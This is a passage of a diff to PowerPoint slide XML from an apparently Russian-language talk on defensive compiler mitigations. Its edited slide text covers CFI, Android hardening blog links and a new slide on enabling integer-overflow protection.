-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android media stack:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Android Developers Blog: Hardening media stack</a:t>
-            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Android Developers Blog: Compiler-based security mitigations in Android P</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>- и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>kernelspace</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="sv-SE" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>System hardening in Android 11</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36827,7 +37185,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5801BD-7B4E-4514-8AA3-A09D92C0889F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EDC4A3-65C4-4E94-A281-A0BE05178B80}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36854,7 +37212,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925941201"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607254691"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36886,7 +37244,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A565717-4BAA-4EF0-AE04-1234344C22C6}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E390CB5-FF6E-4765-B937-FC6BA0EF02FC}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36903,14 +37261,21 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CFI: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Целочисленные переполнения</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="